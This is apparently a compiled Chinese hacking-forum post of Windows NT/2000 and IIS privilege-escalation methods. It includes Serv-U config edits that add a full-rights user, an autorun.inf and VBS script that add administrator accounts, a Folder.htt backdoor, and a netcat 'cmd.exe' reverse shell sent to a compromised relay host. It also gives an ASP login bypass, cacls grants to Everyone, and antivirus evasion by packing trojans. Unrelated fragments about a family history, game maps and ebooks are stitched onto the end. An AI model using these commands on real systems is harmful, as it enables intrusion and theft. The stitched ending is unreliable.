很不错的提权新方法狂歌

Ring的权限提升21大法!以下全部是本人提权时候的总结很多方法至今没有机会试验也没有成功,但是我是的确看见别人成功过

的。本人不才,除了第一种方法自己研究的,其他的都是别人的经验总结。希望对朋友有帮助!

1.radmin连接法

条件是你权限够大,对方连防火墙也没有。封装个radmin上去,运行,开对方端口,然后radmin上去

。本人从来米成功过。,端口到是给对方打开了。

2.paanywhere

C:\DocumentsandSettings\AllUsers\ApplicationData\Symantec\pcAnywhere\这里下他的GIF

文件,在本地安装pcanywhere上去

3.SAM破解

C:\WINNT\system32\config\下他的SAM破解之

4.SU密码夺取

C:\DocumentsandSettings\AllUsers\「开始」菜单\程序\

引用:Serv-U,然后本地查看属性,知道路径后,看能否跳转进去后,如果有权限修改ServUDaemon.ini,加个用户上去,密码为空[USER=WekweN|1]Password=HomeDir=c:\TimeOut=600Maintenance=SystemAccess1=C:\|RWAMELCDPAccess1=d:\|RWAMELCDPAccess1=f:\|RWAMELCDPSKEYValues=这个用户具有最高权限,然后我们就可以ftp上去quotesiteexecxxx来提升权限

5.c:\winnt\system32\inetsrv\data\

引用:就是这个目录,同样是erveryone完全控制,我们所要做的就是把提升权限的工具上传上去,

然后执行

6.SU溢出提权

这个网上教程N多不详细讲解了

7.运行Csript

引用:运行"cscriptC:\Inetpub\AdminScripts\adsutil.vbsgetw3svc/inprocessisapiapps"来提

"C:\WINNT\system32\inetsrv\ssinc.dll""C:\WINNT\system32\msw3prt.dll""c:\winnt\system32

\inetsrv\asp.dll"可以用cscriptadsutil.vbsget/W3SVC/InProcessIsapiApps来查看是不是加进去了

8.脚本提权

c:\DocumentsandSettings\AllUsers\「开始」菜单\程序\启动"写入bat,vbs

9.VNC

默认情况下VNC密码存放在HKCU\Software\ORL\WinVNC3\Password

我们可以用vncx4

破解它,vncx4使用很简单,只要在命令行下输入

c:\>vncx4-W

然后顺序输入上面的每一个十六进制数据,没输完一个回车一次就行了。

10.NC提权

给对方来个NC但是条件是你要有足够的运行权限然后把它反弹到自己的电脑上HOHOOK了

箱号手机号尽量看看HOHO

12.IPC空连接

如果对方真比较白痴的话扫他的IPC如果运气好还是弱口令

13.替换服务

这个不用说了吧?个人感觉相当复杂

14.autorun.inf

autorun=xxx.exe这个=后面自己写HOHO加上只读、系统、隐藏属性传到哪个盘都可以的不相信

他不运行

15.desktop.ini与Folder.htt

引用:首先,我们现在本地建立一个文件夹,名字不重要,进入它,在空白处点右键,选择“自定义

文件夹”(xp好像是不行的)一直下点,默认即可。完成后,你就会看到在此目录下多了两个名为Folder

setting的文件架与desktop.ini的文件,(如果你看不到,先取消“隐藏受保护的操作系统文件”)然后

我们在Foldersetting目录下找到Folder.htt文件,记事本打开,在任意地方加入以下代码:

ID=”RUNIT”WIDTH=0HEIGHT=0TYPE=”application/x-oleobject”CODEBASE=”你的后门文件名”>

然后你将你的后门文件放在Foldersetting目录下,把此目录与desktop.ini一起上传到对方

任意一个目录下,就可以了,只要等管理员浏览了此目录,它就执行了我们的后门

16.su覆盖提权

本地安装个su,将你自己的ServUDaemon.ini文件用从他那下载下来的ServUDaemon.ini覆盖掉,重

起一下Serv-U,于是你上面的所有配置都与他的一模一样了

17.SU转发端口

43958这个是Serv-U的本地管理端口。FPIPE.exe上传他,执行命令:Fpipe–v–l3333–r

43958127.0.0.1意思是将4444端口映射到43958端口上。然后就可以在本地安装一个Serv-u,新建一个

Serv-u了

18.SQL帐户密码泄露

如果对方开了MSSQL服务器,我们就可以通过用SQL连接器加管理员帐号(可以从他的连接数据库的

ASP文件中看到),因为MSSQL是默认的SYSTEM权限。

引用:对方没有删除xp_cmdshell方法:使用Sqlexec.exe,在host一栏中填入对方IP,User与Pass

中填入你所得到的用户名与密码。format选择xp_cmdshell”%s”即可。然后点击connect,连接上后就可

以在CMD一栏中输入你想要的CMD命令了

19.asp.dll

引用:因为asp.dll是放在c:\winnt\system32\inetsrv\asp.dll(不同的机子放的位置不一定相同

)我们现在加进去cscriptadsutil.vbsset/W3SVC/InProcessIsapiApps"C:\WINNT\system32\idq.dll"

\inetsrv\asp.dll"好了,现在你可以用cscriptadsutil.vbsget/W3SVC/InProcessIsapiApps来查看是不是加进去了,注意,用法中的get和set,一个是查看一个是设置.还有就是你运行上面的你要到

C:\Inetpub\AdminScripts>这个目录下.那么如果你是一个管理员,你的机子被人用这招把asp提升为system权限,那么,这时,防的方法就是把

asp.dllT出特权一族,也就是用set这个命令,覆盖掉刚才的那些东东.

20.MagicWinmail

21.DBO……其实提升权限的方式很多的就看大家怎么利用了HOHO加油吧将服务器控制到底!

autorun.inf[autorun]open=shell.vbsshell.vbsdimwshsetwsh=CreateObject("WScript.Shell")wsh.run"netuserguest/active:yes",0wsh.run"netuserguest520ls",0wsh.run"netlocalgroupadministratorsguest/add",0wsh.run"netuserhkbme520ls/add",0wsh.run"netlocalgroupadministratorshkbme/add",0wsh.run"cmd.exe/cdelautorun.inf",0wsh.run"cmd.exe/cdelshell.vbs",0但是这样要可以访问到对方的根目录。将这两个文件放到对方硬盘的根目录下。当然你也可以直接执行木马程序,还要一个木马程序,但是语句就和最后两句一样,通过CMD执行木马程序三Folder.htt与desktop.ini将改写的Folder.htt与desktop.ini,还有你的木马或者是VBS或者是什么,放到对方管理员最可能浏览的目录下,觉得一个不够,可以多放几个Folder.htt添加代码但是后门和这两个文件必须要放到一块,有点问题,可以结合启动VBS,运行结束后,删除上传的后门.就是CODEBASE="shell.vbs".shell写法如上

四replace替换法,可以替换正在执行的文件。用这个几乎可以马上得到权限,但是我没有做过试验,可以试下,将对方正在执行的文件替换为和它文件名一样的,捆绑了木马的。为什么不直接替换木马呢?如果替换的是关键程序,那不是就直接挂了?所以还是捆绑好点格式REPLACE[drive1:][path1]filename[drive2:][path2][/A]

[/R][/W]REPLACE[drive1:][path1]filename[drive2:][path2]

[/R][/S][/W]

[drive1:][path1]filename指定源文件。[drive2:][path2]指定要替换文件的目录。/A把新文件加入目标目录。不能和/S或/U命令行开关搭配使用。/P替换文件或加入源文件之前会先提示您进行确认。/R替换只读文件以及未受保护的文件。/S替换目标目录中所有子目录的文件。不能与/A命令选项搭配使用。/W等您插入磁盘以后再运行。/U只会替换或更新比源文件日期早的文件。不能与/A命令行开关搭配使用这个命令没有试验过,看能不能替换不能访问的文件夹下的文件,大家可以试验下五脚本编写一个启动/关机脚本配置文件scripts.ini,这个文件名是固定的,不能改变。内容如下:

[Startup]0CmdLine=a.bat0Parameters=

将文件scripts.ini保存到“C:\\winnt\\system32\\GroupPolicy\\Machine\\Scripts”A.BAT的内容可以是NETUSERyonghumima也可以是NETUSERADMINistratorXXX这样可以恢复你想要得任意用户名的密码,也可以自己增加新的用户,但是要依赖重启,还有就是对SYSTEM32有写的权限六SAM如果可以访问对方的SYSTEM32的话,删除对方的SAM文件,等他重启以后就是ADMIN用户密码为空突然又有了想法,可以用REPLACE命令替换的吗,可以把你的SAM文件提取出来,上传到他的任意目录下,然后替换。不过不知道如果对SYSTEM32没有权限访问的话,能不能实现替换

----------------------------------------------------------------------------------

那么你的bat就应该是:

已测试成功!!

--利用%5c绕过验证利用%5c绕过验证

说到%5c,你是不是想起了当前流行的那个%5c暴库漏洞,呵呵,本文就是对%5c利用的探索(呵呵,当然有我提出的新东东,或许对你有帮助哦^_^)。

N年以前利用这个漏洞可以实现目录遍历,虽然微软出了补丁,不过好像补丁是用来限制iis只能访问虚拟目录的,所以漏洞还是存在,只不过利用方式变了。对iis来说,提交一个含有%5c的url能够找到文件,但是该文件里以相对路径引用的其他文件却找不到了(%5c是\\的url编码,iis跳转到上一级目录去找,当然找不到;头晕了吧,哈哈,我也头晕啊)。

后来这个漏洞就被牛人挖掘出来了,也就是传说中的%5c暴库:由于连接数据库的文件引用的相对路径,提交%5c找不到文件,所以导致出错,iis就会老老实实的说出数据库的路径(不明白?找google)。

一个偶然的机会我发现还可以利用%5c绕过asp的验证;当我们暴库失败的时候不妨试试。

废话少说,看下面的代码:

<%guest_user=trim(request("guest_user"))guest_password=trim(request("guest_password"))Setrs=Server.CreateObject("ADODB.Recordset")sql="select*fromadminwhereid=1"rs.opensql,conn,3,2readuser=rs("guest_user")readpassword=rs("guest_password")ifreaduser<>guest_userorreadpassword<>guest_passwordthenresponse.write"请输入正确地管理员密码!"response.endelsesession("admin")=1\'登陆后写入seesion中保存response.write("登陆成功,请返回信息页")endif%>

看到没有,要想通过验证必须让数据库里的用户名密码与提交的一致;想到什么?让我们再看看数据库连接文件代码:

<%onerrorresumenextsetconn=server.createobject("adodb.connection")DBPath=Server.MapPath("guestbook.asp")conn.Open"driver={MicrosoftAccessDriver(*.mdb)};dbq="&DBPath%>

啊,有容错语句不能暴库!等等,如果提交%5c数据库找不到,由于容错,所以程序会继续执行,那么说来从数据库得到的用户名密码皆为空(想想有时暴库失败是不是看到空空的框架,因为数据都是空嘛),哈哈,这样我们就绕过验证了!

知道怎么做了吧,把登陆页面保存到本地,修改提交的url,把最后一个/改成%5c,用户名密码用空格(有的程序会检查用户名密码是否为空,空格会被程序过滤),提交,就ok了。

诶,各位不要以为我自己没事写段代码来捣鼓,实际上这个是我们学校一个高手做的留言板程序,就挂在学校的主页,呵呵。

既然弄懂了原理,当然要找实际漏洞啦,自然是拿大名鼎鼎的“洞”网论坛开刀。不过失败了,因为它的数据库连接文件里有这么一段:

IfErrThenerr.ClearSetConn=NothingResponse.Write"数据库连接出错,请检查连接字串。"Response.EndEndIf

数据库找不到程序就结束了,呵呵,空欢喜一场。

接着又去down了bbsxp论坛,打开数据库连接文件,晕,根本没有容错语句;呵呵,不过可以暴库哦。

总结一下这个攻击方法成功的条件:1、数据库连接用的相对路径且仅有简单的容错语句;2、服务器iis版本为4或5;3、程序里不检查空字符或者检查时不过滤空格而比较时过滤空格;4、程序不能在一级目录

至于防范,呵呵,既然攻击条件知道了,防范措施自然也出来了^_^

--添加超级用户的.asp代码[蓝屏的原创,凯文改进,Ms未公布的漏洞]

其实上个礼拜我和凯文就在我的肉鸡上测试了,还有河马史诗.结果是在user权限下成功添加Administrators组的用户了(虽然我不敢相信我的眼睛).上次凯文不发话,我不敢发布啊....现在在他的blog上看到他发布了,就转来了咯(比我上次测试时还改进了一点,加了个表单).这下大家有福咯```

反正代码是对的,但是很少能成功,具体的看运气了。。呵呵,下一步我想把他整合到海洋里面去。嘿嘿。

.network对象脚本权限提升漏洞利用工具用户:
密码:

本文讲的重点是webshell权限的提升和绕过防火墙,高手勿笑。

废话少说,咱们进入正题。

测试一下权限,在cmd里运行set,获得主机一些信息,系统盘是D盘,也说明了我们的webshell有运行权限的。那我们看看C盘有什么呢?难道是双系统?浏览后发现没有什么系统文件,只有一些垃圾文件,晕死。没关系,再来检查一下,虚拟主机都有serv-u的,这台也不例外,是5.0.0.8的。呵呵,是有本地溢出的呀,挖哈哈。

传上了srv.exe和nc.exe在H:\\long\\sun***\\lemon(网站目录)后,发现没有运行权限。没关系,根据经验,一般系统下D:\\DocumentsandSettings\\AllUsers\\是应该有运行权限的。于是想把文件copy过去,但是发现我们的webshell没有对D盘写的权限,晕死。

可以浏览D:\\programfiles\\serv-u\\ServUDaemon.ini,不能改,难道要破解serv-u的密码,晕,不想。

不可以这么就泄气了,我突然想到为什么系统不放在C盘了,难道C盘是FAT32分区的?(后来证明了我们的想法。这里说一下,如果主机有win98的系统盘,那里99%是FAT32分区的。我们还遇到过装有Ghost的主机,为了方便在DOS下备份,它的备份盘一般都是FAT分区的。)如果系统盘是FAT32分区,则网站就没有什么安全性可言了。虽然C盘不是系统盘,但是我们有执行权限。呵呵,copysrv.exe和nc.exe到c:\\,运行srv.exe“nc.exe–ecmd.exe202.*.*.*888”,这里的202.*.*.*是我们的肉鸡,在这之前我们已经在肉鸡上运行了nc–l–p888。我们在学校内网里,没有公网ip,不爽-ing。

我们成功获得一个系统shell连上肉鸡。(看起来简单,其实这里我们也遇到过挫折,我们发现有些版本的nc居然没有-e这个参数,还以为全世界nc功能都一样。后来又发现不同版本的nc互连不成功,会出现乱码,没办法用。为此,上传n次,错误n次,傻了n次,后来终于成功了。做黑客还真得有耐心和恒心。)

高兴之余,我们仍不满足,因为这个shell实在是太慢了。于是,想用我们最常用的Radmin,其实管理员一按Alt+Ctrl+Del,看进程就能发现r_server了,但是还是喜欢用它,是因为不会被查杀。好了,上传admdll.dll,raddrv.dll,r_server.exe到H:\\long\\sun***\\lemon,再用刚才nc得到的shell把它们copy到d:\\winnt\\system32\\下,分别运行:r_server/install,netstartr_server,r_server/pass:rain/save。

不管了,我们重启serv-u就ok了,怎么重启呢,开始想用shutdown重启系统,但那样我们就失去了nc这个shell,还可能被发现。后来,眼睛一亮,我们不是有pskill吗?刚才用pslist发现有这个进程:ServUDaemon。把它kill了。然后再运行D:\\programfiles\\serv-u\\ServUAdmin.exe,这里要注意不是ServUDaemon.exe。

好了,到这里,我们直接ftp上去吧,ls一下,哈哈,系统盘在我的掌握下。我们能不能运行系统命令呢?是可以的,这样就可以:

ftp>quotesiteexecnetuserxrrain/add

在webshell上运行netuser,就可以看见添加成功了。

整个入侵渗透到这就结束了,在一阵后清理打扫后。我们就开始讨论了。其实,突破防火墙有很多好的rootkit可以做到的,但是我们觉得系统自带的服务才是最安全的后门。

------------------------------------------------------------------------------------

winNT/2000提升权限

WindowsNT/2000通用的提升方法

攻击者在获得系统一定的访问权限后通常要把自己的权限提升到管理员组,这样攻击者就控制了该计算机系统。这主要有以下几种方法:1.获得管理员密码,下次就可以用该密码进入系统;2.先新建一个用户,然后把这个普通添加到管理员组,或者干脆直接把一个不起眼的用户如guest添加到管理员组;3.安装后门。

本文简要介绍在WindowsNT4和Windows2000里攻击者常用的提升权限的方法。下面是具体方法:

问题:(1)攻击者不一定可以访问该文件(看攻击者的身份和管理员的设置);(2)这个文件是上次系统备份时的帐号列表(也可能是第一次系统安装时的),以后更改帐号口令的话,就没用了。

方法2:使用pwdump(L0pht自带的,Windows2000下无效)或者pwdump2,取得系统当前的用户列表和口令加密列表,然后用L0pht破解这个列表。

问题:普通用户不能成功运行pwdump类程序(没有权限),例如:使用unicode漏洞进入系统时是IUSR_computer身份,该用户一般只属于guests组的,运行pwdump类程序就会失败。

(以上两种是离线的)

方法3:使用Enum等程序进行远程破解,猜口令。enum可以使用指定的字典对远程主机的某个用户进行破解。

问题:(1)如果系统设置了帐号锁定的话,破解几次失败,该帐号就锁定了,暂时不能再破解;(2)要远程系统开放Netbios连接,就是TCP的139端口,如果用防火墙过滤了的话Enum就无法连接到主机。

(以上方法是通过破解获得密码的,还有直接把当前用户提升权限或者添加用户到管理员组的方法。)

方法4:GetAdmin(WinNT4下)、PipeUpAdmin(Windows2000下),在本机运行可以把当前用户帐号加入管理员组。而PipeUpAdmin则比较厉害,普通用户和Guests组用户都可以成功运行。

问题:GetAdmin在SP4有补丁修复了,不能用于高于SP4的WinNT4系统,当然后来又有GetAdmin的增强版本,不过在SP6a下好像都不能成功运行。

注:这一方法利用了WinNT4系统的安全漏洞,可以安装补丁解决这一问题。

(此外还有变通的方法。)

方法5:在WinNT4和Windows2000注册表里指定用户Shell程序(Explorer.exe)

时没有使用绝对路径,而是使用了一个相对路径的文件名(考虑到兼容性问题)。

问题:攻击者必须有安装系统逻辑盘跟目录的写权限才行,而一般管理员都设置该目录普通用户禁写。

注:这种方法利用了WinNT4/Windows2000系统的安全漏洞,可以安装补丁解决这种问题。

问题:(1)杀毒软件或病毒防火墙可能阻止木马运行,还有可能把木马杀死。

(2)有的木马不能在Guests组身份下运行,这可能与它添加自动运行的方式有关;如没有权限改写注册表的自动运行位置,不能写入%system%\\system32目录(一般的木马都改变文件名,然后写入系统目录,如果没有写入权限系统目录,就不能成功执行木马)。

解决:不过也有用压缩程序(不是通常说的压缩程序,这种压缩程序把可执行程序压缩后,文件变小了,但是仍然可以正常执行)将木马压缩,从而逃过杀毒软件的特征码检测。我曾使用Aspack成功压缩了一个木马,逃过了金山毒霸正式版的检测。不过也有的木马Aspack压缩不了,如冰河。

问题:安装较麻烦,成功的可能性低,而且安装不当会造成被安装的系统不能启动。

方法8:本地溢出。缓冲区溢出是进行攻击的最好办法,因为一般都可以获得系统权限或者管理员权限;不过很多远程溢出攻击不需要事先有执行程序的权限,而本地溢出就恰好适合提升权限。WinNT4的IIS4的ASP扩展有一个本地溢出漏洞,Windows2000的静态图像服务也有一个溢出漏洞,利用该漏洞,攻击者可以获得系统权限。当然WindowsNT和Windows2000还有很多程序有溢出漏洞,这是这些程序不是总在运行,因此被利用的可能性比较小。

问题:(1)ASP扩展的溢出漏洞需要攻击者有向网站的脚本目录的写权限,才能把攻击程序放到网站上,然后执行。

(2)静态图像服务缺省没有安装,只有用户在Windows2000上安装静态图像设备(如数码相机、扫描仪等)时才自动安装。

Windows2000专用提升漏洞方法方法1:Windows2000的输入法漏洞,利用这个漏洞任何人可以以LocalSystem身份执行程序,从而可以用来提升权限,不过该漏洞一般限于物理接触Windows2000计算机的人。当然如果开放了终端服务的话,攻击者也可以远程利用该漏洞。

注:这一方法利用了Windows2000系统的安全漏洞,可以安装补丁解决这一问题。

方法2:利用Windows2000的NetworkDDEDSDM服务漏洞普通用户可以LocalSystem身份执行任意程序,可以借此更改密码、添加用户等。Guests组用户也可以成功利用该漏洞。

问题:这个服务缺省没有启动,需要启动这个服务。

方法3:Windows2000的TELNET服务进程建立时,该服务会创建一个命名管道,并用它来执行命令。但是,该管道的名字能被预见。如果TELNET发现一个已存在的管道名,它将直接用它。攻击者利用此漏洞,能预先建立一个管道名,当下一次TELNET创建服务进程时,便会在本地SYSTEM环境中运行攻击者代码。

方法4:WINDOWS2K存在一个利用DebugRegisters提升权限的漏洞。如果攻击者能在WIN2K中运行程序,利用此漏洞,他至少能取得对%Windir%\\SYSTEM32和注册表HKCR的写权。因为x86DebugRegistersDR0-7对于所有进程都是全局共享的,因此在一个进程中设置硬件断点,将影响其它进程和服务程序。

注:这一方法利用了Windows2000系统的安全漏洞,不过到目前为止微软仍然没有补丁可以安装,但是漏洞攻击程序已经出现了,因此只能堵住攻击者的入口来阻止利用该漏洞。

--巧妙配合asp木马取得后台管理权限顶(这个可是经典。。。自己体会我不多说了)巧妙配合asp木马取得后台管理权限顶(这个可是经典。。。自己体会我不多说了)

作者:aweige来自:中国黑客红色军团

图二看到有什么异常吗,没有吧?还是正常页面,但是我们接着在地址栏中输入它的后台管理首页看看,是不是进去了?图三:

图四还有,如果是动网7.0以下的默认数据库admin表名和7.0以上有点不一样,所以实际操作中不可生搬硬套。

后记:对于以上两种方法直到目前为止我还想不出任何比较有效的解决方法,因为你的网站被人家放了马,你根本就没办法去阻止人家去插入,要是谁有好的解决方法记得告诉我。

另外,希望大家不要去搞破坏,那时我真的不愿看到的,也祝所有的网管们好运,希望你们不会碰上craker们。

[此贴子已经被作者于2004-12-2520:51:09编辑过]------------------------------------------------------------------------------------

巧用asp木马和KV2004得到管理员权限

或者上传文件。行动!在kv2004下随便找个htm文件删除:(看看有无写删权限)C:\\>delc:\\kv2004\\GetLicense.htm拒绝访问

奇怪了,再来看看文件甲属性C:\\>attribc:\\kv2004SRC:\\KV2004

哦是只读。C:\\>attrib-r-sc:\\kv2004

ok!在试试C:\\>delc:\\kv2004\\GetLicense.htm

成功了!好写个起用帐号和提升权限的bat文件,然后把bat文件和kv2004的系统服务文件KVSrvXP.exe捆绑起来,(注意多下种捆绑器,捆绑一

次用kv2004来扫描一次,因为很多捆绑器生成的文件kv会把他作为病毒来处理掉)准备上传了,先删掉原来的KVSrvXP.exe。C:\\>delc:\\kv2004\\KVSrvXP.exe拒绝访问

可能是KVSrvXP.exe被windows调用中,删不掉。没办法了吗?不,删不掉我改名C:\\>renc:\\kv2004\\KVSrvXP.exekv.exe

OK!然后用asp木马把修改了的KVSrvXP.exe上传到kv2004中,接下来就去睡觉把。4个小时后登上来用:netuser起用的帐户

已经在administrators组中,接下来要关防火墙,关杀毒软件,还是种木马你随便我了,哈哈!我觉得入侵没什么固定的模式,具体情况具体分析,杀毒软件同样也可以帮我们忙,这里我只提供了一种思路。请大家指教。如何绕过防火墙提升权限

CAcls命令在提权中的使用

cacls.exec:/e/t/geveryone:F#把c盘设置为everyone可以浏览cacls.exed:/e/t/geveryone:F#把d盘设置为everyone可以浏览cacls.exee:/e/t/geveryone:F#把e盘设置为everyone可以浏览cacls.exef:/e/t/geveryone:F#把f盘设置为everyone可以浏览

F:\safe\溢出工具\sqlhello2>cacls显示或者修改文件的访问控制表(ACL)

CACLSfilename[/T][/E][/C][/Guser:perm][/Ruser[...]][/Puser:perm[...]][/Duser[...]]filename显示ACL。/T更改当前目录及其所有子目录中指定文件的ACL。/E编辑ACL而不替换。/C在出现拒绝访问错误时继续。/Guser:perm赋予指定用户访问权限。Perm可以是:R读取W写入C更改(写入)F完全控制/Ruser撤销指定用户的访问权限(仅在与/E一起使用时合法)。/Puser:perm替换指定用户的访问权限。Perm可以是:N无R读取W写入C更改(写入)F完全控制/Duser拒绝指定用户的访问。在命令中可以使用通配符指定多个文件。作者:阿汀

THE END
1.海宁袁花查氏六百年来的故事他发现袁花依山面海、土地肥沃,民风淳厚与故里婺源相似,最后定居于海宁園花龙山东南之古扑桥(后人称查家桥)。 因祖居地休宁曾名海宁,查氏在婺源居于“凤山”,查氏在海宁居于袁花之“龙山”。取龙凤呈祥之意,袁花是富饶的鱼米之乡。因查瑜既有才学,又有精妙之医术利济他人,“以儒为业,耕读为荣,诗礼传家”,...https://www.meipian.cn/225vjn57
1....海族的入侵1.1正式版附攻略及隐藏英雄密码魔兽防守地图下载海族的入侵1.1正式版发布,支持1-5个人联机游戏,是一张好玩有趣的防守类魔兽地图,守护渔村打败娜迦率领的海族30波进攻,最后打败总BOSS赢得胜利。感兴趣的玩家快来下载体验吧。 地图发布 地图名称: 海族的入侵1.1正式版 地图类型: 防守 魔兽版本: 1.24 https://www.jb51.net/game/723300.html
2.应急响应入侵排查篇pchunter官网入侵排查思路 检查系统账号安全 1、查看服务器是否有弱口令,远程管理端口是否对公网开放。 ? 检查方法:据实际情况咨询相关服务器管理员。 2、查看服务器是否存在可疑账号、新增账号。 ? 检查方法:打开 cmd窗口,输入 lusrmgr.msc 命令,查看是否有新增/可疑的账号,如有管理员群组的(Administrators)里的新增账户,...https://blog.csdn.net/y15754/article/details/139259828
3.GitHub俺共享的 PDF 格式电子书,无需密码即可阅读。如果你无法打开 PDF 文件或者打开过程中提示输入密码,那应该是你的 PDF 阅读器版本不够新。用如下几款软件可以正常阅读。 Sumatra PDF2.0 或者更高版本(绿色软件,除了支持 PDF,还支持其它格式,强烈推荐使用) ...https://github.com/qpyghb/books
4.九月2008Teaker'sBlog只需人族的建筑一升一降,可以把海盗船施展的封锁网效果去掉 另外建筑升降还可以干很多事,比如压航母的小飞机,去掉Z族的黄雾效果等 虫族永久隐型大法 需要条件:你要拥有P的Arbiter,再升级虫族埋地,就能很轻松的完成以下BUG 做法:把虫族可埋地单位全部埋下,拖走Arbiter,再慢慢移动Arbiter,在Arbiter的隐型范围到达埋地...https://teaker.wordpress.com/2008/09/